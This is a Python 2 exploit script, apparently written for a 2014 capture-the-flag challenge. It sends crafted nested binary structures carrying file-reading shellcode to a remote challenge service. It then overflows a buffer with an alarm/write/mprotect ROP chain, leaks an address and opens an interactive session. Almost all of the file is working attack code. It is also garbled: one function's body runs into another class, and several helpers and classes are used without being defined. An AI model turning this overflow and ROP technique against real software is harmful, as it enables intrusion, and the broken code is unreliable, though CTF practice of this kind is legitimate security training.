#!/usr/bin/python import struct import socket import telnetlib shellcode = '31d231c9eb255bb805000000cd80ba4000000089e189c3b803000000cd80bb04000000b804000000cd80cce8d6ffffff6b657900'.decode('hex').ljust(95 '\x90') def pack_le(v): return struct.pack('I', v) def unpack(v): return struct.unpack('H', len(self.data)) endianness = not endianness return header + val + self.data + ''.join(t.encode() for t in self.sub_things) class JME(object): magic = 0x454D4A sub_things = [] data = None def length(self): return 8 + 3 + len(self.data) + sum(t.length() for t in self.sub_things) def encode(self): global endianness header = screw_endian(self.magic, self.length()) val = struct.pack('H', len(self.data)) return header + 'A' + val + self.data + ''.join(t.encode() for t in self.sub_things) class JML(object): magic = 0x4C4D4A data = None def length(self): return 8 + len(self.data) def encode(self): header = screw_endian(self.magic, self.length()) return header + self.data s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #s.connect(('whelk.club.cc.cmu.edu', 4334)) s.connect(('bytesexual.2014.ghostintheshellcode.com', 4334)) f = s.makefile('rw', bufsize=0) raw_input() f.write('1\n') f.write(pack_le(0x80000000)) #jml = JML() #jml.data = 'A' # jme = JME() jme.data = shellcode #jme.sub_things = [jml] jme.sub_things = [] root_jfd = JFD() root_jfd.data = 'hello' root_jfd.sub_things = [jme] jbsp = JBSP() jbsp.root_jfd = root_jfd encoded = jbsp.encode() f.write('1\n') f.write(pack_le(len(encoded)) + encoded) f.write('1\n') f.write(pack_le(0x1000)) f.write('A' * 0x1000) encoded = jbsp.encode() f.write('1\n') f.write(pack_le(len(encoded)) + encoded) f.write('4\n') f.write('hello\n') tlv = screw_endian(0x41414141, 0x7fffffff) f.write(tlv) ''' 80483de: 58 pop %eax 80483df: 5e pop %esi 80483e0: 5f pop %edi 80483e1: 59 pop %ecx 80483e2: 5a pop %edx 80483e3: 5b pop %ebx 80483e4: cb lret ''' gadget = 0x80483de int_80_ret = 0x80482e0 cs_32 = 0x23 jbsp = 0x0804C768 #shellcode_addr = 0x775dd110 # mine shellcode_addr = 0x775e5110 # theirs payload = 'A' * 2076 payload += pack_le(gadget) payload += pack_le(0x1b) # alarm payload += pack_le(0) payload += pack_le(0) payload += pack_le(0) payload += pack_le(0) payload += pack_le(9999) # 0 seconds payload += pack_le(int_80_ret) payload += pack_le(cs_32) payload += pack_le(gadget) payload += pack_le(0x4) # write payload += pack_le(0) payload += pack_le(0) payload += pack_le(jbsp) # buf payload += pack_le(4) # len payload += pack_le(4) # fd payload += pack_le(int_80_ret) payload += pack_le(cs_32) payload += pack_le(gadget) payload += pack_le(0x7d) # mprotect payload += pack_le(0) payload += pack_le(0) payload += pack_le(4096) # len payload += pack_le(7) # prot payload += pack_le(shellcode_addr & 0xfffff000) payload += pack_le(int_80_ret) payload += pack_le(cs_32) payload += pack_le(shellcode_addr) for _ in xrange(61): f.readline() f.write(payload) print 'About to shutdown' s.shutdown(socket.SHUT_WR) data = f.read(4) shellcode_addr = unpack(data) + 0x6c print 'shellcode_addr:', hex(shellcode_addr) t = telnetlib.Telnet() t.sock = s t.interact()